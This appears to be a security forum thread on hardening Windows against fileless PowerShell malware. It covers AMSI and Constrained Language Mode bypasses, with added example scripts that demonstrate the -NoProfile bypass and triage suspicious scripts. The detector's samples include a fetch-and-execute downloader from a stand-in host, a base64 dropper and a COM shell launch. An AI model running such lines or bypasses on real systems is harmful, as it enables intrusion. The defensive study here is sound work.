Now you see me: Exposing fileless malware

Status
Not open for further replies.

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,598
Speaking of System.Management.Automation... Did anyone else but me read the AMSI exploit details?

Satoshi's note: AMSI Bypass With a Null Character

It was an interesting find of his; luckily it was fixed sooner rather than later.
Interesting. :)
This exploit gives the attacker some possibilities, and I think that there can be more uncovered vulnerabilities.
Anyway, the example of malicious script used in the article will be blocked by CLM before the exploitation event.
Yet, the script can be slightly modified to fully bypass both AMSI and CLM.
 
Last edited:
  • Like
Reactions: AtlBo and shmu26

ParaXY

Level 6
Verified
Mar 14, 2017
273
What would happen if I set Powershell to use "no language mode"?

What I should have asked is:

If I set Powershell to "no language mode", will anything break in Windows? I'm not talking about running custom PS scripts. Rather, I am asking if it'll cause any issues while logged in with a SUA doing normal day-to-day tasks (internet, email, etc.).
 

Deleted member 65228

If I set Powershell to "no language mode", will anything break in Windows? I'm not talking about running custom PS scripts. Rather, I am asking if it'll cause any issues while logged in with a SUA doing normal day-to-day tasks (internet, email, etc.).
Nope, I doubt it.

I actually disable it and my environment works fine.

What software do you use though? If you use anything which uses PowerShell, it might cause a problem, of course.
 

ParaXY

I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.

I think it'll be ok but just wanted to check.
 

Andy Ful

I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.
I think it'll be ok but just wanted to check.
You will be protected if AppGuard is set to block PowerShell. If not, then PowerShell can, for example, run script malware filelessly.
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Just curious why NLM is so easy to bypass?
 
  • Like
Reactions: AtlBo

Andy Ful

Just curious why NLM is so easy to bypass?
Because it is normally introduced via the PowerShell profile, and can be bypassed by the -noprofile switch in the PowerShell command. I did not find another way to set this language mode.
 
  • Like
Reactions: AtlBo and shmu26
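As an added example (not code from the post above, nor from Hard_Configurator), the following shows the profile mechanism Andy describes, why -NoProfile defeats it, and one machine-wide alternative. It assumes Windows PowerShell 5.1 in an elevated session; $ProfilePath is the real all-users profile location, and the __PSLockdownPolicy value is an engine switch that is not a documented, supported policy control.

```powershell
# Added example, not from the thread. Assumes Windows PowerShell 5.1 and an elevated session;
# $ProfilePath is the real all-users profile path, and __PSLockdownPolicy=4 is an undocumented
# engine switch, not a supported policy control.

# Which mode is this session in? FullLanguage, ConstrainedLanguage, RestrictedLanguage or NoLanguage.
$ExecutionContext.SessionState.LanguageMode

# 1. Enforce the mode from the all-users profile, as the post describes. Write "NoLanguage"
#    instead of "ConstrainedLanguage" for the stricter mode. This only works if the execution
#    policy lets profile.ps1 run at all (e.g. RemoteSigned).
$ProfilePath = $PROFILE.AllUsersAllHosts   # C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
Set-Content -Path $ProfilePath -Value '$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"'

# 2. A new process runs the profile and lands in the restricted mode; -NoProfile skips profile.ps1
#    entirely, so the same query reports the unrestricted mode.
$ModeProbe = '$ExecutionContext.SessionState.LanguageMode'
powershell.exe -Command $ModeProbe
powershell.exe -NoProfile -Command $ModeProbe

# 3. The same difference from a payload's point of view: New-Object on a non-core .NET type is
#    refused by CLM, but goes through once the profile is skipped.
$PayloadProbe = "try { (New-Object Net.WebClient).GetType().Name } catch { 'blocked: ' + `$_.Exception.Message }"
powershell.exe -Command $PayloadProbe
powershell.exe -NoProfile -Command $PayloadProbe

# 4. A machine-wide alternative that -NoProfile cannot skip: the engine reads the __PSLockdownPolicy
#    environment variable at start-up (4 = ConstrainedLanguage). Only processes started after the
#    variable exists see it, and any administrator can delete it again.
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
$env:__PSLockdownPolicy = '4'   # let this shell's children see it without a re-logon
powershell.exe -NoProfile -Command $ModeProbe

# Undo both changes when done testing.
Remove-Item -Path $ProfilePath
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', $null, 'Machine')
```

The profile route is only as strong as the things that decide whether profile.ps1 runs: the -NoProfile switch, the execution policy, and write access to the profile file. The environment-variable route moves the decision into the engine start-up path, but it is still just a value any administrator can remove, so neither is a substitute for blocking the engine where that is an option.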

509322

Powershell as an exploitation vector will be quasi-dead in less than 5 years, according to an expert. MS will rely a lot on PS, so it will increase Windows' security around it.

That's equivalent to saying PowerShell will be 50 % in 5 years. Microsoft has a terrible track record. I'd bet all my money on a blind Tarot card reader before that expert's statement.
 

509322

I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.

I think it'll be ok but just wanted to check.

@ParaXY, @shmu26

I know you keep PowerShell disabled. Have you experienced any problems with Windows Updates not installing any feature updates, or Office 2016 not updating, because PowerShell is disabled?
 

509322

That is true in theory and may be a fact in the future. (y)
Bypassing it is not rocket science, because I can do it. :)
But so far, Constrained Language mode is the most effective security against almost all dangerous PowerShell attacks, including targeted attacks based on pentester tools like Metasploit.

Hey, I'm on your side, but I'm not convinced of the effectiveness of CLM by what I have seen in messing with it. So instead I choose the nuclear option. I know you have that PoC. If you have a PoC - and there are other PoCs - I wonder what some criminal has done. So the probability is that there is already nasty stuff somewhere in the works or out there in the wild. We just ain't heard of or seen it yet.

The only effective way to protect a system against PowerShell attacks - right from Microsoft Security itself - is to disable the shell and system.management.automation.dll at the same time. All paths *powershell*, *powershell_ise* and *system.management.automation*.

Even then, I don't fully trust what Microsoft advises will provide absolute security !!! :unsure:


MetaSploit, PowerSploit, and such pen-test tools make for really disingenuous videos where the user had to allow something - like macros - in an Office Word document. Plus the video creator does not explain that such attacks are targeted and instead leaves the Average Joe who doesn't know nor understand anything that is happening in the video, to view and arrive all by themselves at all the wrong face-value conclusions and go crazy in their mind. Now some would argue that the video creator is lying by omission to the viewer as well as creating fear, uncertainty and doubt.

It's basically in the same vein as the IT security news that reports things without fully explaining things - the exceptions and caveats - to the general public.
 
Last edited by a moderator:

Andy Ful

Hey, I'm on your side, but I'm not convinced of the effectiveness of CLM by what I have seen in messing with it. So instead I choose the nuclear option. I know you have that PoC. If you have a PoC - and there are other PoCs - I wonder what some criminal has done. So the probability is that there is already nasty stuff somewhere in the works or out there in the wild. We just ain't heard of or seen it yet.

The only effective way to protect a system against PowerShell attacks - right from Microsoft Security itself - is to disable the shell and system.management.automation.dll at the same time. All paths *powershell*, *powershell_ise* and *system.management.automation*.

Even then, I don't fully trust what Microsoft advises will provide absolute security !!! :unsure:


MetaSploit, PowerSploit, and such pen-test tools make for really disingenuous videos where the user had to allow something - like macros - in an Office Word document. Plus the video creator does not explain that such attacks are targeted and instead leaves the Average Joe who doesn't know nor understand anything that is happening in the video, to view and arrive all by themselves at all the wrong face-value conclusions and go crazy in their mind. Now some would argue that the video creator is lying by omission to the viewer as well as creating fear, uncertainty and doubt.

It's basically in the same vein as the IT security news that reports things without fully explaining things - the exceptions and caveats - to the general public.
I did not have in mind that I disagree with you. :)
We totally agree about the potential strength/weakness of CLM. (y)
The best, but also the most radical, method is blocking all instances of system.management.automation.dll. Some people do not like such radical methods, and then CLM is for them.
CLM is very effective (more effective than antivirus) only because of malc0ders' habits and the tons of malicious scripts that are still very effective when applying functions that are blocked by CLM.
Additionally, CLM works natively on Windows 8+, so on Windows 7 one has to update PowerShell to version 3.0 (most users still use PowerShell 2.0).
I analyzed many PowerShell scripts embedded in malicious documents from Malware Vault (Samples) + many scripts scattered on several websites, and 99% of them use advanced PowerShell functions blocked by CLM. Some de-obfuscated examples are here:
How-to Guide - How to de-obfuscate PowerShell script commands (Examples).
They are very effective because almost nobody uses CLM. It is possible that malc0ders do not bother to fight CLM (so far), because the users who use CLM are probably experienced and this would shorten the malware's life.
That is why I wrote in my previous post that in theory your statement is true:
Malc0ders do not need the stuff that Constrained Language Mode disables to completely smash a system.
If malc0ders change their habits, or when the scripts are no longer so effective, then your statement will be true in the wild. That will probably happen in the future if Microsoft abandons this feature. (y)
 
Last edited:
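The claim above, that most in-the-wild PowerShell payloads lean on constructs CLM refuses, can be checked mechanically. Below is an added example (not code from the post, and not the linked de-obfuscation guide) that parses a script with PowerShell's own AST and reports the CLM-blocked constructs it finds. The core-type allow-list is an approximation of the one in about_Language_Modes, and the four samples are constructed for illustration, not real captures.

```powershell
# Added example, not from the thread: static triage of a PowerShell sample for constructs that
# Constrained Language mode refuses. $CoreTypes approximates the about_Language_Modes allow-list;
# the samples at the bottom are made up for illustration.

$CoreTypes = @(
    'array','bool','byte','char','datetime','decimal','double','float','guid','hashtable',
    'int','int16','int32','int64','long','math','ordered','psobject','pscustomobject',
    'regex','sbyte','single','string','switch','timespan','uint16','uint32','uint64','xml'
)

function Get-ClmBlockedConstructs {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast  = [System.Management.Automation.Language.Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    $hits = [System.Collections.Generic.List[string]]::new()

    # Type literals such as [Net.WebClient] or [IO.File]: CLM allows only the core types, so
    # static method calls, casts and ::new() through anything else fail at run time.
    $typeAsts = $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.TypeExpressionAst] }, $true)
    foreach ($t in $typeAsts) {
        $name = ($t.TypeName.FullName -replace '^System\.', '').ToLower()
        if ($CoreTypes -notcontains $name) { $hits.Add("type literal [$($t.TypeName.FullName)]") }
    }

    # Cmdlets that CLM blocks outright (Add-Type) or restricts to core types (New-Object; -ComObject is never allowed).
    $cmdAsts = $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.CommandAst] }, $true)
    foreach ($c in $cmdAsts) {
        $argText = ($c.CommandElements | Select-Object -Skip 1 | ForEach-Object { $_.Extent.Text }) -join ' '
        switch ($c.GetCommandName()) {
            'Add-Type'   { $hits.Add('Add-Type (compiles source into the host process)') }
            'New-Object' {
                $target = ($argText -replace '^-TypeName\s+', '' -replace '^System\.', '').ToLower()
                if ($argText -match '-ComObject' -or $CoreTypes -notcontains $target) { $hits.Add("New-Object $argText") }
            }
        }
    }
    return $hits.ToArray()
}

# Constructed samples: three typical shapes CLM stops, and one it does not.
$Samples = [ordered]@{
    'downloader'   = '$w = New-Object Net.WebClient; IEX $w.DownloadString(''http://example.invalid/a.ps1'')'
    'dropper'      = '[IO.File]::WriteAllBytes("$env:TEMP\x.exe", [Convert]::FromBase64String($b)); Start-Process "$env:TEMP\x.exe"'
    'com-launch'   = '$sh = New-Object -ComObject WScript.Shell; $sh.Run(''calc.exe'')'
    'clm-tolerant' = 'Invoke-WebRequest -Uri ''http://example.invalid/a.txt'' -OutFile "$env:TEMP\a.txt"; Start-Process notepad "$env:TEMP\a.txt"'
}

foreach ($name in $Samples.Keys) {
    $found = Get-ClmBlockedConstructs -ScriptText $Samples[$name]
    if ($found.Count) { "$name : would fail under CLM -> $($found -join '; ')" }
    else              { "$name : nothing here for CLM to stop; rely on AMSI, AppLocker/SRP or blocking the engine" }
}
```

The check is deliberately static and conservative: it flags the New-Object and type-literal sites that CLM rejects, but it cannot see method calls on objects created elsewhere (the $w.DownloadString in the first sample is only caught because its New-Object is), and it says nothing about scripts that stay inside cmdlets, which is exactly the "malc0ders do not need the stuff CLM disables" case discussed in the thread.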

509322

I did not have in mind that I disagree with you. :)
We totally agree about the potential strength/weakness of CLM. (y)
The best, but also the most radical, method is blocking all instances of system.management.automation.dll. Some people do not like such radical methods, and then CLM is for them.
CLM is very effective (more effective than antivirus) only because of malc0ders' habits and the tons of malicious scripts that are still very effective when applying functions that are blocked by CLM.
Additionally, CLM works natively on Windows 8+, so on Windows 7 one has to update PowerShell to version 3.0 (most users still use PowerShell 2.0).
I analyzed many PowerShell scripts embedded in malicious documents from Malware Vault (Samples) + many scripts scattered on several websites, and 99% of them use advanced PowerShell functions blocked by CLM. Some de-obfuscated examples are here:
How-to Guide - How to de-obfuscate PowerShell script commands (Examples).
They are very effective because almost nobody uses CLM. It is possible that malc0ders do not bother to fight CLM (so far), because the users who use CLM are probably experienced and this would shorten the malware's life.
That is why I wrote in my previous post that in theory your statement is true:
Malc0ders do not need the stuff that Constrained Language Mode disables to completely smash a system.
If malc0ders change their habits, or when the scripts are no longer so effective, then your statement will be true in the wild. That will probably happen in the future if Microsoft abandons this feature. (y)

Unless a home user is using PowerShell to manage Server, IIS, SharePoint, MySQL, PowerShell Remoting, scripting in PowerShell, creating PowerShell tools, etc, etc - they should disable it for security purposes. It's just a sound security practice to eliminate that attack surface. Otherwise they invoke the "8 Ball Rule" and throw the dice.
 
Last edited by a moderator:

Andy Ful

Deep in the heart, I would like to disable the PowerShell library system.management.automation.dll.:)
PROS:

  • After blocking this library, PowerShell 3+ is dead.
  • One can copy the PowerShell executables to another folder with another filename, and they will still be dead.
  • One can compile an application that uses PowerShell functions directly from this library (not using the PowerShell executables), and this will also fail.
CONS:

  • There is no good Windows built-in mechanism to block this DLL in Windows Home and Pro.
  • One could use SRP with DLL checking, but this will break Edge and can slow down the system.
  • Microsoft announced that PowerShell will replace CMD, and CMD is commonly used by some system scheduled tasks and third-party programs.
  • The scheduled task sdiagnhost.exe can often trigger the troubleshooter scripts TS_WERQueue.ps1 and TS_DiagnosticHistory.ps1, and the library of functions CL_Utility.ps1.
  • Some popular applications use PowerShell, like Chocolatey, K-Lite Codec Pack, etc.
  • PowerShell can be used by hardware vendors to update their software.
So, blocking the PowerShell library system.management.automation.dll can be recommended to advanced users.
I would not recommend it on computers of average users.
 
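Before deciding on the "nuclear option" discussed in the last two posts, it helps to see what blocking the engine would actually have to cover. The script below is an added example (not Hard_Configurator's code and not from any post): it lists every copy of System.Management.Automation.dll on disk, every running process that has the engine loaded (which is how sdiagnhost.exe and custom .NET hosts show up even when powershell.exe is blocked), and whether SRP's DLL checking is switched on. The search roots are the usual locations on Windows 10 with PowerShell 5.1 and an optional PowerShell 7 install; treat them as assumptions for your build.

```powershell
# Added example, not from the thread. Inventories the PowerShell engine DLL and its hosts so a
# path-based block can be judged for completeness. Search roots are assumed; run elevated so
# that .Modules of other users' processes can be read.

function Get-PSAutomationCopies {
    $roots = @(
        "$env:SystemRoot\Microsoft.NET\assembly",   # .NET 4 GAC: GAC_MSIL\System.Management.Automation\...
        "$env:SystemRoot\assembly",                 # .NET 2/3.5 GAC (PowerShell 2.0 engine)
        "$env:SystemRoot\WinSxS",                   # component store copies
        "$env:ProgramFiles\PowerShell",             # PowerShell 7 ships its own engine DLL
        "${env:ProgramFiles(x86)}\PowerShell"
    ) | Where-Object { Test-Path $_ }

    Get-ChildItem -Path $roots -Recurse -Filter 'System.Management.Automation.dll' -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Path    = $_.FullName
                Version = $_.VersionInfo.ProductVersion
                SHA256  = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
}

function Get-PSAutomationHosts {
    # Any process with the engine loaded: powershell.exe, powershell_ise.exe, pwsh.exe, but also
    # sdiagnhost.exe and third-party .NET applications that host the engine directly.
    Get-Process | ForEach-Object {
        try   { $mods = $_.Modules }          # throws for processes we cannot open (or 32/64-bit mismatch)
        catch { return }
        if ($mods.ModuleName -contains 'System.Management.Automation.dll') {
            [pscustomobject]@{ Id = $_.Id; Name = $_.ProcessName; Path = $_.Path }
        }
    }
}

function Test-SrpDllChecking {
    # Software Restriction Policies: TransparentEnabled = 1 checks executables only,
    # 2 checks all software files including libraries (the "DLL checking" the thread refers to).
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    $v   = (Get-ItemProperty -Path $key -Name TransparentEnabled -ErrorAction SilentlyContinue).TransparentEnabled
    [pscustomobject]@{ SrpConfigured = [bool]$v; DllCheckingOn = ($v -eq 2) }
}

Get-PSAutomationCopies | Format-Table -AutoSize
Get-PSAutomationHosts  | Format-Table -AutoSize
Test-SrpDllChecking
```

Two things the output makes concrete: a rule on *powershell* alone leaves every engine copy and every non-PowerShell host untouched, and a rule on *system.management.automation* only bites when SRP (or another control) is actually inspecting DLL loads, which is the setting the thread warns will slow the system and break Edge.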